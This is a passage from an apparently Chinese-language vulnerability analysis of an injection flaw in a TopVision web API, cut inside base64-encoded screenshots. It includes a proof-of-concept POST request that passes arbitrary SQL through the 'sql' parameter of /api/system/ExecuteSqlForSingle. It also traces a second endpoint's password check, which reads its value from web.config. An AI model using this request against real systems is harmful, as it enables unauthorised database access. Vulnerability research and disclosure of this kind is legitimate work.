dw7+1cxr83aMyhbQ+cp3vjnz2kdvvJVp31/5zjet25Sxf/jBtVCMHt88HVNIVV2PcfvNu/8m43r178+++0czr/3eb/9hgJ6UK+641DwcXxb9fj9xea/X89STZqn7/RaqQU0dIIcsX5jfeu1P5Gs7X58JcHzn4F/NTdAj7ljigjxNoX3P8v5kveGJ277K/ddNXW6Con80lvUHItcC6qTq61H3HW2H6xFV+rPv/tFMgCMpGFJ32nc9Jv03epxNPj5Xtv8f93q9p8uiPwM45X341fLuQ1n50ae+my3Fh++8XnnUU4MFoRRtP2l7H+eviCz9q/NxoLikYE5Vw64+euOt4AEOn+pyrHV80rco10JalscinIMmSHovsr7eZHW/Xvv9Pje7DRUNUNmycRYhS8f8/3Gv14v9f7Tt9XlS5H6s7vdbqIb3TJ3W8dB3kwAqZMs4mpcspCLK+iPfNgwn9E0E3HEtoE64XtBUcVk6IosR9AAAm4UYfhUdKhM3bCYaDY2uE10v7rUs22fZh21ojxm1zRqFjYv6xh2fS/tZ+5+0rWsbrtu4nP88/asqiyo6TOmNtT+Y+T1uveiy6FChpGFDLvvN076rtP7HMfsTtzxu/3GvJx1bWj9cfPTGW4k1UFR02JHL+lmYT5JdhkJoP5KWx+0/7nVzX1UMETKfROvTuixj76t+mt2Ea8H2XuV9L+P6nna9mO2lbefSvmv/XdiuNdvy6Dq67Pbt23Lr1q3c65Qh5PVovgcu10RZ3y1FrqkmXa/mdRgdpmIuT7vWkq75LNer7TvWZ3aFOVzJZRjT7/32HzrXtImuF/e6ua+yhovF7dNWX8gc1pXUfp6gWB3+fxzXB9s+zWs37npM+l4vS977sbLuV5PuldL6h/pa2tzcbHLtYmdxH4ykiz1pnbgL23w96+95XretG8d1+7zH59qnpOWubeTZtuzjz9K/f/Yv/7l8befrM6/bggrRYEfcz9H14wI7ceun/V6kfZfaQC79T/o5y3Lb8UaPLcvxvfWf/Ocij8/I79/+tyIyO/zqzIO/kZWH33v6e1KtmLiaE3E3Jy6vJe3b1l7Sz1mWx7Vnu9mJ22eW44qy3azE/e7ys22/ZanztWC2l3V5Wr/Sfnc5FtvyosfnIsu1lraNy37S9l2GKq5H1+XmPpOup7K/W/Jci027XkXSrxvzWityjefdroxr2papk7aOWZ8m6ecsy+Paiwum2Pbp2uesxxdtP62/SW3Z+P7/cdI1lOf72LXtsr+Pi96P6DKR/Per0W3NdYvci2HalSuvlr7P+/f3rcu819QZbqzL0WuXfTcrItMXsBmltK1TRduh6+aoLMdXdf/jvjTm7UvkjbU/mPrPtk7cz677j/7smnFTVvshuRyfr+PR2grmk1nzj/SmDX+wPZm2rVO2uD+s6j6uvs7XQlqbRfoUd0Pq+xiLtFf2teaynY/rOPT1aGujiu+WLPtv+vWalV5r5jUd/b3sWYfq/l2dlS1jx7ZOFe1H240LyJh1esostFy3/x+b121SICZ6/UfXDSnP/U6R+9V5u7/CE0xpXhINEkX/NdnS3lwVLZpV1vCtvP2vksv5b7qiw4Nsw5B8tV+1osdXtiqG1IRmGyqAZPN8LaB56ng9FvluidvGNjyL765kSUOsXGkWRNrwxaazDbNqiib22ZcqAz1l3I9VKW1oFuprIWrq1EEZgYayty86fAt+Fck0KWP69KTsorThVVXz2davf/VbsTNgVXmTZLsJ83ljVrebwDqb92tB+4FmqPtnt4z+ZRl+hXhmdkPeoE50H9F99/v9UgI7ccOfRLIPHyrCZ1s2aTVzXLafJ2Ywsci1VnUAssj9WNXq1Bdk4334Vet4JK3DI9/
<p blockindex=30>11、最终回到第9步的 sqlCommand.ExecuteScalar进行sql执行：</p>
<p blockindex=31><img src=data:image/png;base64,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
<p blockindex=32>12、因此注入点即为参数sql处，可直接执行sql参数的值，poc如下：</p>
<pre blockindex=33><code class="hljs language-js">POST /api/system/ExecuteSqlForSingle HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: 
Content-Type: application/x-www-form-urlencoded

token=zxh&amp;sql=select @@version&amp;strParameters=
</code></pre>
<p blockindex=34>13、接着第二个接口TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle</p>
<p blockindex=35><img src="data:image/png;base64,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
<p blockindex=36>14、首先会校验webservicePassword，进入GetWebServicePassword查看</p>
<p blockindex=37><img src="data:image/png;base64,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
<p blockindex=38>15、发现是从配置中读取WebServicePassword，于是打开web.config，搜索WebServicePassword值：</p>
<p blockindex=39><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABVEAAAPgCAYAAAA7pjw5AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdf3AbZ37n+Q9E6octyxZpy0PRHtuySM1G0ShDMUrugNmbbDSWQ1jJKBXbO5PdrLxVKnBrc0tiq857LsV1W3XrUqnKd7WELtk74lRZMxN7NpZuR8lI4FoaTbKbELsZhWLCaDRZEbL8Q6Y4HpuUrB+WSAJ9fzQabADdAB4QICnp/apC2QK/6H76BxqNL77P8wQsy7IEAAAAAAAAAPC0bLEbAAAAAAAAAABLGUlUAAAAAAAAACiBJCoAAAAAAAAAlFA2ifrWsXf0Zz8c1n9/7wP9n//+TV27cbPkcwAAAAAAAABwNwl4TSw1dWtaf33pJ/qvx/9YX/zSZt28ekXXrl7RYz/zZaX+8i+07ks/q9vXPtONq1fU1L5ZH4/8pZY/sVFfePIpPf3Qcm3QJ3rqZ/7+YmwPAAAAAAAAANRUY+ETlqTrM2l9eOOWHlzXoscef0xXVq9W43336wvr1+vDdev10KMturpylT5vWKH7Hl6nm2uatXrNQ5pMW5q59KGufXyaJCoAAAAAAACAu0JRJepMJqP3P7up/3b5U21bt1YNgYBmMpam0xlNZzKazli6PZvW7UxGt2bTujWb1nQ6o0+vXZcyaa2cel8a/WP1/M7vL9Y2AQAAAAAAAEDNFFWifj6b0eezaa1ubFAmk5EUUDpjKZ3JaDad0Wwmo9lMWul0RplMRhkr+/xsWqsaArqvsUGfL8KGOC6eiuvk1Ha98HyHmhaxHWVNjejI4dOalNS8/QV1Th5ewHZPaeTIKWnH8+pokqSLOhU/qQulXtJcrm0XdSo+rOYXnGWauKhT8Xf1dGSHNpi+FAAAAAAAAKizoiTqjelZXZ+e1Zrljbpx83NlZGk2k9FM2lWNmk7rdvb/b83aFanXb1zTylUrtSJg+SZRL56K6+SFjXqmMFmWTShq+wt6Pi8DN6WRI4d1uukZRXbcTem1izqV3d5IR5Ps7VzI9TepY8dGHTkc1+QzEe3YsEE7IhHt8Au/eErx7JxhUyNHdPj0pO+SLxyO67TXHzbebccQAAAAAAAA94qiJOr1mVldn5nVAyuWa0VASluWAhlLymRkpdPKZCxl0nYlajqdUeOyjJYF0go0LNeDq+/XuhUP6KrPyjY8vVG6MKUrU5K7pHHqvQualKQL72mqo2nuT1Pv6cKktLHzLku+TV3RlJq18SlnS5vU8XxEHQvZhqYOPf/MpOLDI9q2ofLq16aO5xXxbGj5StSyCdi4dy1sc1FyHQAAAAAAAFg4Ht3507o5k9a6VSs0Mzur2XRGMxn7MZ3OaMb5dzqjmdnsf9OzmpmZ1cpAQGtWFC1yzoantVEndeG9KXU0OUmxKb13YVIbt2/X1OlJXZEr